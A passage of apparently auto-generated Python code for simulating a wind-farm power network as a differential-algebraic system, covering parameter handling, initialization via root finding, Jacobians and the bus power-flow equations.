('Gy_ini_rows', np.int64, self.Gy_ini_rows.shape),
('Gy_ini_cols', np.int64, self.Gy_ini_cols.shape),
('Ac_ini', np.float64, ((self.N_x+self.N_y,self.N_x+self.N_y))),
('fg', np.float64, ((self.N_x+self.N_y,1))),
]
values = [
self.t_end,
self.Dt,
self.decimation,
self.itol,
self.Dt_max,
self.Dt_min,
self.solvern,
self.imax,
self.N_steps,
self.N_store,
self.N_x,
self.N_y,
self.N_z,
self.t,
self.it,
self.it_store,
0, # idx
0, # idy
np.zeros((self.N_x,1)), # f
np.zeros((self.N_x,1)), # x
np.zeros((self.N_x,1)), # x_0
np.zeros((self.N_y,1)), # g
np.zeros((self.N_y,1)), # y_run
np.zeros((self.N_y,1)), # y_ini
np.zeros((self.N_u,1)), # u_run
np.zeros((self.N_y,1)), # y_0
np.zeros((self.N_z,1)), # h
np.zeros((self.N_x,self.N_x)), # Fx
np.zeros((self.N_x,self.N_y)), # Fy
np.zeros((self.N_y,self.N_x)), # Gx
np.zeros((self.N_y,self.N_y)), # Fy
np.zeros((self.N_x,self.N_u)), # Fu
np.zeros((self.N_y,self.N_u)), # Gu
np.zeros((self.N_z,self.N_x)), # Hx
np.zeros((self.N_z,self.N_y)), # Hy
np.zeros((self.N_z,self.N_u)), # Hu
np.zeros((self.N_x,self.N_x)), # Fx_ini
np.zeros((self.N_x,self.N_y)), # Fy_ini
np.zeros((self.N_y,self.N_x)), # Gx_ini
np.zeros((self.N_y,self.N_y)), # Fy_ini
np.zeros((self.N_store+1,1)), # T
np.zeros((self.N_store+1,self.N_x)), # X
np.zeros((self.N_store+1,self.N_y)), # Y
np.zeros((self.N_store+1,self.N_z)), # Z
np.zeros((self.N_store+1,1)), # iters
1,
self.Fx_ini_rows,
self.Fx_ini_cols,
self.Fy_ini_rows,
self.Fy_ini_cols,
self.Gx_ini_rows,
self.Gx_ini_cols,
self.Gy_ini_rows,
self.Gy_ini_cols,
np.zeros((self.N_x+self.N_y,self.N_x+self.N_y)),
np.zeros((self.N_x+self.N_y,1)),
]
dt += [(item,np.float64) for item in self.params_list]
values += [item for item in self.params_values_list]
for item_id,item_val in zip(self.inputs_ini_list,self.inputs_ini_values_list):
if item_id in self.inputs_run_list: continue
dt += [(item_id,np.float64)]
values += [item_val]
dt += [(item,np.float64) for item in self.inputs_run_list]
values += [item for item in self.inputs_run_values_list]
self.struct = np.rec.array([tuple(values)], dtype=np.dtype(dt))
xy0 = np.zeros((self.N_x+self.N_y,))
self.ini_dae_jacobian_nn(xy0)
self.run_dae_jacobian_nn(xy0)
def load_params(self,data_input):
if type(data_input) == str:
json_file = data_input
self.json_file = json_file
self.json_data = open(json_file).read().replace("'",'"')
data = json.loads(self.json_data)
elif type(data_input) == dict:
data = data_input
self.data = data
for item in self.data:
self.struct[0][item] = self.data[item]
if item in self.params_list:
self.params_values_list[self.params_list.index(item)] = self.data[item]
elif item in self.inputs_ini_list:
self.inputs_ini_values_list[self.inputs_ini_list.index(item)] = self.data[item]
elif item in self.inputs_run_list:
self.inputs_run_values_list[self.inputs_run_list.index(item)] = self.data[item]
else:
print(f'parameter or input {item} not found')
def save_params(self,file_name = 'parameters.json'):
params_dict = {}
for item in self.params_list:
params_dict.update({item:self.get_value(item)})
params_dict_str = json.dumps(params_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(params_dict_str)
def save_inputs_ini(self,file_name = 'inputs_ini.json'):
inputs_ini_dict = {}
for item in self.inputs_ini_list:
inputs_ini_dict.update({item:self.get_value(item)})
inputs_ini_dict_str = json.dumps(inputs_ini_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(inputs_ini_dict_str)
def ini_problem(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,2)
ini(self.struct,3)
else:
ini.py_func(self.struct,2)
ini.py_func(self.struct,3)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_problem(self,x):
t = self.struct[0].t
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
run(t,self.struct,2)
run(t,self.struct,3)
run(t,self.struct,10)
run(t,self.struct,11)
run(t,self.struct,12)
run(t,self.struct,13)
else:
run.py_func(t,self.struct,2)
run.py_func(t,self.struct,3)
run.py_func(t,self.struct,10)
run.py_func(t,self.struct,11)
run.py_func(t,self.struct,12)
run.py_func(t,self.struct,13)
fg = np.vstack((self.struct[0].f,self.struct[0].g))[:,0]
return fg
def run_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,13)
A_c = np.block([[self.struct[0].Fx,self.struct[0].Fy],
[self.struct[0].Gx,self.struct[0].Gy]])
return A_c
def run_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_run[:,0] = x[self.N_x:(self.N_x+self.N_y)]
run_nn(0.0,self.struct,10)
run_nn(0.0,self.struct,11)
run_nn(0.0,self.struct,12)
run_nn(0.0,self.struct,13)
def eval_jacobians(self):
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
return 1
def ini_dae_jacobian(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
if self.compile:
ini(self.struct,10)
ini(self.struct,11)
else:
ini.py_func(self.struct,10)
ini.py_func(self.struct,11)
A_c = np.block([[self.struct[0].Fx_ini,self.struct[0].Fy_ini],
[self.struct[0].Gx_ini,self.struct[0].Gy_ini]])
return A_c
def ini_dae_jacobian_nn(self,x):
self.struct[0].x[:,0] = x[0:self.N_x]
self.struct[0].y_ini[:,0] = x[self.N_x:(self.N_x+self.N_y)]
ini_nn(self.struct,10)
ini_nn(self.struct,11)
def f_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_odeint(self,x,t):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def f_ivp(self,t,x):
self.struct[0].x[:,0] = x
run(self.struct,1)
return self.struct[0].f[:,0]
def Fx_ode(self,x):
self.struct[0].x[:,0] = x
run(self.struct,10)
return self.struct[0].Fx
def eval_A(self):
Fx = self.struct[0].Fx
Fy = self.struct[0].Fy
Gx = self.struct[0].Gx
Gy = self.struct[0].Gy
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
self.A = A
return A
def eval_A_ini(self):
Fx = self.struct[0].Fx_ini
Fy = self.struct[0].Fy_ini
Gx = self.struct[0].Gx_ini
Gy = self.struct[0].Gy_ini
A = Fx - Fy @ np.linalg.solve(Gy,Gx)
return A
def reset(self):
for param,param_value in zip(self.params_list,self.params_values_list):
self.struct[0][param] = param_value
for input_name,input_value in zip(self.inputs_ini_list,self.inputs_ini_values_list):
self.struct[0][input_name] = input_value
for input_name,input_value in zip(self.inputs_run_list,self.inputs_run_values_list):
self.struct[0][input_name] = input_value
def simulate(self,events,xy0=0):
# initialize both the ini and the run system
self.initialize(events,xy0=xy0)
# simulation run
for event in events:
# make all the desired changes
self.run([event])
# post process
T,X,Y,Z = self.post()
return T,X,Y,Z
def run(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
daesolver(self.struct) # run until next event
return 1
def rtrun(self,events):
# simulation run
for event in events:
# make all the desired changes
for item in event:
self.struct[0][item] = event[item]
self.struct[0].it_store = self.struct[0].N_store-1
daesolver(self.struct) # run until next event
return 1
def post(self):
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return T,X,Y,Z
def save_0(self,file_name = 'xy_0.json'):
xy_0_dict = {}
for item in self.x_list:
xy_0_dict.update({item:self.get_value(item)})
for item in self.y_ini_list:
xy_0_dict.update({item:self.get_value(item)})
xy_0_str = json.dumps(xy_0_dict, indent=4)
with open(file_name,'w') as fobj:
fobj.write(xy_0_str)
def load_0(self,file_name = 'xy_0.json'):
with open(file_name) as fobj:
xy_0_str = fobj.read()
xy_0_dict = json.loads(xy_0_str)
for item in xy_0_dict:
if item in self.x_list:
self.xy_prev[self.x_list.index(item)] = xy_0_dict[item]
if item in self.y_ini_list:
self.xy_prev[self.y_ini_list.index(item)+self.N_x] = xy_0_dict[item]
def initialize(self,events=[{}],xy0=0,compile=True):
'''
Parameters
----------
events : dictionary
Dictionary with at least 't_end' and all inputs and parameters
that need to be changed.
xy0 : float or string, optional
0 means all states should be zero as initial guess.
If not zero all the states initial guess are the given input.
If 'prev' it uses the last known initialization result as initial guess.
Returns
-------
T : TYPE
DESCRIPTION.
X : TYPE
DESCRIPTION.
Y : TYPE
DESCRIPTION.
Z : TYPE
DESCRIPTION.
'''
self.compile = compile
# simulation parameters
self.struct[0].it = 0 # set time step to zero
self.struct[0].it_store = 0 # set storage to zero
self.struct[0].t = 0.0 # set time to zero
# initialization
it_event = 0
event = events[it_event]
for item in event:
self.struct[0][item] = event[item]
## compute initial conditions using x and y_ini
if type(xy0) == str:
if xy0 == 'prev':
xy0 = self.xy_prev
else:
self.load_0(xy0)
xy0 = self.xy_prev
elif type(xy0) == dict:
with open('xy_0.json','w') as fobj:
fobj.write(json.dumps(xy0))
self.load_0('xy_0.json')
xy0 = self.xy_prev
else:
if xy0 == 0:
xy0 = np.zeros(self.N_x+self.N_y)
elif xy0 == 1:
xy0 = np.ones(self.N_x+self.N_y)
else:
xy0 = xy0*np.ones(self.N_x+self.N_y)
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.ini_problem, xy0,
jac=self.ini_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.ini_problem, xy0, method=self.sopt_root_method)
self.initialization_ok = True
if sol.success == False:
print('initialization not found!')
self.initialization_ok = False
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
if self.initialization_ok:
xy = sol.x
self.xy_prev = xy
self.struct[0].x[:,0] = xy[0:self.N_x]
self.struct[0].y_run[:,0] = xy[self.N_x:]
## y_ini to u_run
for item in self.inputs_run_list:
if item in self.y_ini_list:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.inputs_ini_list:
if item in self.y_run_list:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
#xy = sopt.fsolve(self.ini_problem,xy0, jac=self.ini_dae_jacobian )
if self.sopt_root_jac:
sol = sopt.root(self.run_problem, xy0,
jac=self.run_dae_jacobian,
method=self.sopt_root_method, tol=self.initialization_tol)
else:
sol = sopt.root(self.run_problem, xy0, method=self.sopt_root_method)
if self.compile:
# evaluate f and g
run(0.0,self.struct,2)
run(0.0,self.struct,3)
# evaluate run jacobians
run(0.0,self.struct,10)
run(0.0,self.struct,11)
run(0.0,self.struct,12)
run(0.0,self.struct,14)
else:
# evaluate f and g
run.py_func(0.0,self.struct,2)
run.py_func(0.0,self.struct,3)
# evaluate run jacobians
run.py_func(0.0,self.struct,10)
run.py_func(0.0,self.struct,11)
run.py_func(0.0,self.struct,12)
run.py_func(0.0,self.struct,14)
# post process result
T = self.struct[0]['T'][:self.struct[0].it_store]
X = self.struct[0]['X'][:self.struct[0].it_store,:]
Y = self.struct[0]['Y'][:self.struct[0].it_store,:]
Z = self.struct[0]['Z'][:self.struct[0].it_store,:]
iters = self.struct[0]['iters'][:self.struct[0].it_store,:]
self.T = T
self.X = X
self.Y = Y
self.Z = Z
self.iters = iters
return self.initialization_ok
def get_value(self,name):
if name in self.inputs_run_list:
value = self.struct[0][name]
if name in self.x_list:
idx = self.x_list.index(name)
value = self.struct[0].x[idx,0]
if name in self.y_run_list:
idy = self.y_run_list.index(name)
value = self.struct[0].y_run[idy,0]
if name in self.params_list:
value = self.struct[0][name]
if name in self.outputs_list:
value = self.struct[0].h[self.outputs_list.index(name),0]
return value
def get_values(self,name):
if name in self.x_list:
values = self.X[:,self.x_list.index(name)]
if name in self.y_run_list:
values = self.Y[:,self.y_run_list.index(name)]
if name in self.outputs_list:
values = self.Z[:,self.outputs_list.index(name)]
return values
def get_mvalue(self,names):
'''
Parameters
----------
names : list
list of variables names to return each value.
Returns
-------
mvalue : TYPE
list of value of each variable.
'''
mvalue = []
for name in names:
mvalue += [self.get_value(name)]
return mvalue
def set_value(self,name_,value):
if name_ in self.inputs_run_list:
self.struct[0][name_] = value
return
elif name_ in self.params_list:
self.struct[0][name_] = value
return
elif name_ in self.inputs_ini_list:
self.struct[0][name_] = value
return
else:
print(f'Input or parameter {name_} not found.')
def set_values(self,dictionary):
for item in dictionary:
self.set_value(item,dictionary[item])
def report_x(self,value_format='5.2f', decimals=2):
for item in self.x_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_y(self,value_format='5.2f', decimals=2):
for item in self.y_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_u(self,value_format='5.2f', decimals=2):
for item in self.inputs_run_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_z(self,value_format='5.2f', decimals=2):
for item in self.outputs_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def report_params(self,value_format='5.2f', decimals=2):
for item in self.params_list:
print(f'{item:5s} = {self.get_value(item):5.{decimals}f}')
def get_x(self):
return self.struct[0].x
def ss(self):
ssate(self.struct,self.xy_prev.reshape(len(self.xy_prev),1))
## y_ini to y_run
self.struct[0].y_run = self.struct[0].y_ini
## y_ini to u_run
for item in self.yini2urun:
self.struct[0][item] = self.struct[0].y_ini[self.y_ini_list.index(item)]
## u_ini to y_run
for item in self.uini2yrun:
self.struct[0].y_run[self.y_run_list.index(item)] = self.struct[0][item]
@numba.njit(cache=True)
def ini(struct,mode):
# Parameters:
S_base = struct[0].S_base
g_W1mv_W2mv = struct[0].g_W1mv_W2mv
b_W1mv_W2mv = struct[0].b_W1mv_W2mv
bs_W1mv_W2mv = struct[0].bs_W1mv_W2mv
g_W2mv_W3mv = struct[0].g_W2mv_W3mv
b_W2mv_W3mv = struct[0].b_W2mv_W3mv
bs_W2mv_W3mv = struct[0].bs_W2mv_W3mv
g_W3mv_POImv = struct[0].g_W3mv_POImv
b_W3mv_POImv = struct[0].b_W3mv_POImv
bs_W3mv_POImv = struct[0].bs_W3mv_POImv
g_STmv_POImv = struct[0].g_STmv_POImv
b_STmv_POImv = struct[0].b_STmv_POImv
bs_STmv_POImv = struct[0].bs_STmv_POImv
g_POI_GRID = struct[0].g_POI_GRID
b_POI_GRID = struct[0].b_POI_GRID
bs_POI_GRID = struct[0].bs_POI_GRID
g_POI_POImv = struct[0].g_POI_POImv
b_POI_POImv = struct[0].b_POI_POImv
bs_POI_POImv = struct[0].bs_POI_POImv
g_W1mv_W1lv = struct[0].g_W1mv_W1lv
b_W1mv_W1lv = struct[0].b_W1mv_W1lv
bs_W1mv_W1lv = struct[0].bs_W1mv_W1lv
g_W2mv_W2lv = struct[0].g_W2mv_W2lv
b_W2mv_W2lv = struct[0].b_W2mv_W2lv
bs_W2mv_W2lv = struct[0].bs_W2mv_W2lv
g_W3mv_W3lv = struct[0].g_W3mv_W3lv
b_W3mv_W3lv = struct[0].b_W3mv_W3lv
bs_W3mv_W3lv = struct[0].bs_W3mv_W3lv
g_STmv_STlv = struct[0].g_STmv_STlv
b_STmv_STlv = struct[0].b_STmv_STlv
bs_STmv_STlv = struct[0].bs_STmv_STlv
U_W1lv_n = struct[0].U_W1lv_n
U_W2lv_n = struct[0].U_W2lv_n
U_W3lv_n = struct[0].U_W3lv_n
U_STlv_n = struct[0].U_STlv_n
U_W1mv_n = struct[0].U_W1mv_n
U_W2mv_n = struct[0].U_W2mv_n
U_W3mv_n = struct[0].U_W3mv_n
U_POImv_n = struct[0].U_POImv_n
U_STmv_n = struct[0].U_STmv_n
U_POI_n = struct[0].U_POI_n
U_GRID_n = struct[0].U_GRID_n
S_n_GRID = struct[0].S_n_GRID
Omega_b_GRID = struct[0].Omega_b_GRID
K_p_GRID = struct[0].K_p_GRID
T_p_GRID = struct[0].T_p_GRID
K_q_GRID = struct[0].K_q_GRID
T_v_GRID = struct[0].T_v_GRID
X_v_GRID = struct[0].X_v_GRID
R_v_GRID = struct[0].R_v_GRID
K_delta_GRID = struct[0].K_delta_GRID
K_sec_GRID = struct[0].K_sec_GRID
Droop_GRID = struct[0].Droop_GRID
K_p_agc = struct[0].K_p_agc
K_i_agc = struct[0].K_i_agc
# Inputs:
P_W1lv = struct[0].P_W1lv
Q_W1lv = struct[0].Q_W1lv
P_W2lv = struct[0].P_W2lv
Q_W2lv = struct[0].Q_W2lv
P_W3lv = struct[0].P_W3lv
Q_W3lv = struct[0].Q_W3lv
P_STlv = struct[0].P_STlv
Q_STlv = struct[0].Q_STlv
P_W1mv = struct[0].P_W1mv
Q_W1mv = struct[0].Q_W1mv
P_W2mv = struct[0].P_W2mv
Q_W2mv = struct[0].Q_W2mv
P_W3mv = struct[0].P_W3mv
Q_W3mv = struct[0].Q_W3mv
P_POImv = struct[0].P_POImv
Q_POImv = struct[0].Q_POImv
P_STmv = struct[0].P_STmv
Q_STmv = struct[0].Q_STmv
P_POI = struct[0].P_POI
Q_POI = struct[0].Q_POI
P_GRID = struct[0].P_GRID
Q_GRID = struct[0].Q_GRID
v_ref_GRID = struct[0].v_ref_GRID
p_m_GRID = struct[0].p_m_GRID
p_c_GRID = struct[0].p_c_GRID
omega_ref_GRID = struct[0].omega_ref_GRID
q_ref_GRID = struct[0].q_ref_GRID
# Dynamical states:
delta_GRID = struct[0].x[0,0]
xi_p_GRID = struct[0].x[1,0]
e_qv_GRID = struct[0].x[2,0]
xi_freq = struct[0].x[3,0]
# Algebraic states:
V_W1lv = struct[0].y_ini[0,0]
theta_W1lv = struct[0].y_ini[1,0]
V_W2lv = struct[0].y_ini[2,0]
theta_W2lv = struct[0].y_ini[3,0]
V_W3lv = struct[0].y_ini[4,0]
theta_W3lv = struct[0].y_ini[5,0]
V_STlv = struct[0].y_ini[6,0]
theta_STlv = struct[0].y_ini[7,0]
V_W1mv = struct[0].y_ini[8,0]
theta_W1mv = struct[0].y_ini[9,0]
V_W2mv = struct[0].y_ini[10,0]
theta_W2mv = struct[0].y_ini[11,0]
V_W3mv = struct[0].y_ini[12,0]
theta_W3mv = struct[0].y_ini[13,0]
V_POImv = struct[0].y_ini[14,0]
theta_POImv = struct[0].y_ini[15,0]
V_STmv = struct[0].y_ini[16,0]
theta_STmv = struct[0].y_ini[17,0]
V_POI = struct[0].y_ini[18,0]
theta_POI = struct[0].y_ini[19,0]
V_GRID = struct[0].y_ini[20,0]
theta_GRID = struct[0].y_ini[21,0]
omega_GRID = struct[0].y_ini[22,0]
i_d_GRID = struct[0].y_ini[23,0]
i_q_GRID = struct[0].y_ini[24,0]
p_g_GRID = struct[0].y_ini[25,0]
q_g_GRID = struct[0].y_ini[26,0]
p_m_GRID = struct[0].y_ini[27,0]
omega_coi = struct[0].y_ini[28,0]
p_agc = struct[0].y_ini[29,0]
# Differential equations:
if mode == 2:
struct[0].f[0,0] = -K_delta_GRID*delta_GRID + Omega_b_GRID*(omega_GRID - omega_coi)
struct[0].f[1,0] = -i_d_GRID*(R_v_GRID*i_d_GRID + V_GRID*sin(delta_GRID - theta_GRID)) - i_q_GRID*(R_v_GRID*i_q_GRID + V_GRID*cos(delta_GRID - theta_GRID)) + p_m_GRID
struct[0].f[2,0] = (K_q_GRID*(-q_g_GRID + q_ref_GRID) - e_qv_GRID + v_ref_GRID)/T_v_GRID
struct[0].f[3,0] = 1 - omega_coi
# Algebraic equations:
if mode == 3:
struct[0].g[:,:] = np.ascontiguousarray(struct[0].Gy_ini) @ np.ascontiguousarray(struct[0].y_ini)
struct[0].g[0,0] = -P_W1lv/S_base + V_W1lv**2*g_W1mv_W1lv + V_W1lv*V_W1mv*(-b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv))
struct[0].g[1,0] = -Q_W1lv/S_base + V_W1lv**2*(-b_W1mv_W1lv - bs_W1mv_W1lv/2) + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv))
struct[0].g[2,0] = -P_W2lv/S_base + V_W2lv**2*g_W2mv_W2lv + V_W2lv*V_W2mv*(-b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv))
struct[0].g[3,0] = -Q_W2lv/S_base + V_W2lv**2*(-b_W2mv_W2lv - bs_W2mv_W2lv/2) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv))
struct[0].g[4,0] = -P_W3lv/S_base + V_W3lv**2*g_W3mv_W3lv + V_W3lv*V_W3mv*(-b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv))
struct[0].g[5,0] = -Q_W3lv/S_base + V_W3lv**2*(-b_W3mv_W3lv - bs_W3mv_W3lv/2) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv))
struct[0].g[6,0] = -P_STlv/S_base + V_STlv**2*g_STmv_STlv + V_STlv*V_STmv*(-b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv))
struct[0].g[7,0] = -Q_STlv/S_base + V_STlv**2*(-b_STmv_STlv - bs_STmv_STlv/2) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) - g_STmv_STlv*sin(theta_STlv - theta_STmv))
struct[0].g[8,0] = -P_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*sin(theta_W1lv - theta_W1mv) - g_W1mv_W1lv*cos(theta_W1lv - theta_W1mv)) + V_W1mv**2*(g_W1mv_W1lv + g_W1mv_W2mv) + V_W1mv*V_W2mv*(-b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv))
struct[0].g[9,0] = -Q_W1mv/S_base + V_W1lv*V_W1mv*(b_W1mv_W1lv*cos(theta_W1lv - theta_W1mv) + g_W1mv_W1lv*sin(theta_W1lv - theta_W1mv)) + V_W1mv**2*(-b_W1mv_W1lv - b_W1mv_W2mv - bs_W1mv_W1lv/2 - bs_W1mv_W2mv/2) + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv))
struct[0].g[10,0] = -P_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*sin(theta_W1mv - theta_W2mv) - g_W1mv_W2mv*cos(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*sin(theta_W2lv - theta_W2mv) - g_W2mv_W2lv*cos(theta_W2lv - theta_W2mv)) + V_W2mv**2*(g_W1mv_W2mv + g_W2mv_W2lv + g_W2mv_W3mv) + V_W2mv*V_W3mv*(-b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv))
struct[0].g[11,0] = -Q_W2mv/S_base + V_W1mv*V_W2mv*(b_W1mv_W2mv*cos(theta_W1mv - theta_W2mv) + g_W1mv_W2mv*sin(theta_W1mv - theta_W2mv)) + V_W2lv*V_W2mv*(b_W2mv_W2lv*cos(theta_W2lv - theta_W2mv) + g_W2mv_W2lv*sin(theta_W2lv - theta_W2mv)) + V_W2mv**2*(-b_W1mv_W2mv - b_W2mv_W2lv - b_W2mv_W3mv - bs_W1mv_W2mv/2 - bs_W2mv_W2lv/2 - bs_W2mv_W3mv/2) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv))
struct[0].g[12,0] = -P_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*sin(theta_W2mv - theta_W3mv) - g_W2mv_W3mv*cos(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*sin(theta_W3lv - theta_W3mv) - g_W3mv_W3lv*cos(theta_W3lv - theta_W3mv)) + V_W3mv**2*(g_W2mv_W3mv + g_W3mv_POImv + g_W3mv_W3lv)
struct[0].g[13,0] = -Q_W3mv/S_base + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) + g_W3mv_POImv*sin(theta_POImv - theta_W3mv)) + V_W2mv*V_W3mv*(b_W2mv_W3mv*cos(theta_W2mv - theta_W3mv) + g_W2mv_W3mv*sin(theta_W2mv - theta_W3mv)) + V_W3lv*V_W3mv*(b_W3mv_W3lv*cos(theta_W3lv - theta_W3mv) + g_W3mv_W3lv*sin(theta_W3lv - theta_W3mv)) + V_W3mv**2*(-b_W2mv_W3mv - b_W3mv_POImv - b_W3mv_W3lv - bs_W2mv_W3mv/2 - bs_W3mv_POImv/2 - bs_W3mv_W3lv/2)
struct[0].g[14,0] = -P_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv)) + V_POImv**2*(g_POI_POImv + g_STmv_POImv + g_W3mv_POImv) + V_POImv*V_STmv*(-b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(-b_W3mv_POImv*sin(theta_POImv - theta_W3mv) - g_W3mv_POImv*cos(theta_POImv - theta_W3mv))
struct[0].g[15,0] = -Q_POImv/S_base + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) + g_POI_POImv*sin(theta_POI - theta_POImv)) + V_POImv**2*(-b_POI_POImv - b_STmv_POImv - b_W3mv_POImv - bs_POI_POImv/2 - bs_STmv_POImv/2 - bs_W3mv_POImv/2) + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) - g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_POImv*V_W3mv*(b_W3mv_POImv*cos(theta_POImv - theta_W3mv) - g_W3mv_POImv*sin(theta_POImv - theta_W3mv))
struct[0].g[16,0] = -P_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*sin(theta_POImv - theta_STmv) - g_STmv_POImv*cos(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*sin(theta_STlv - theta_STmv) - g_STmv_STlv*cos(theta_STlv - theta_STmv)) + V_STmv**2*(g_STmv_POImv + g_STmv_STlv)
struct[0].g[17,0] = -Q_STmv/S_base + V_POImv*V_STmv*(b_STmv_POImv*cos(theta_POImv - theta_STmv) + g_STmv_POImv*sin(theta_POImv - theta_STmv)) + V_STlv*V_STmv*(b_STmv_STlv*cos(theta_STlv - theta_STmv) + g_STmv_STlv*sin(theta_STlv - theta_STmv)) + V_STmv**2*(-b_STmv_POImv - b_STmv_STlv - bs_STmv_POImv/2 - bs_STmv_STlv/2)
struct[0].g[18,0] = -P_POI/S_base + V_GRID*V_POI*(b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) + V_POI**2*(g_POI_GRID + g_POI_POImv) + V_POI*V_POImv*(-b_POI_POImv*sin(theta_POI - theta_POImv) - g_POI_POImv*cos(theta_POI - theta_POImv))
struct[0].g[19,0] = -Q_POI/S_base + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) + g_POI_GRID*sin(theta_GRID - theta_POI)) + V_POI**2*(-b_POI_GRID - b_POI_POImv - bs_POI_GRID/2 - bs_POI_POImv/2) + V_POI*V_POImv*(b_POI_POImv*cos(theta_POI - theta_POImv) - g_POI_POImv*sin(theta_POI - theta_POImv))
struct[0].g[20,0] = -P_GRID/S_base + V_GRID**2*g_POI_GRID + V_GRID*V_POI*(-b_POI_GRID*sin(theta_GRID - theta_POI) - g_POI_GRID*cos(theta_GRID - theta_POI)) - S_n_GRID*p_g_GRID/S_base
struct[0].g[21,0] = -Q_GRID/S_base + V_GRID**2*(-b_POI_GRID - bs_POI_GRID/2) + V_GRID*V_POI*(b_POI_GRID*cos(theta_GRID - theta_POI) - g_POI_GRID*sin(theta_GRID - theta_POI)) - S_n_GRID*q_g_GRID/S_base
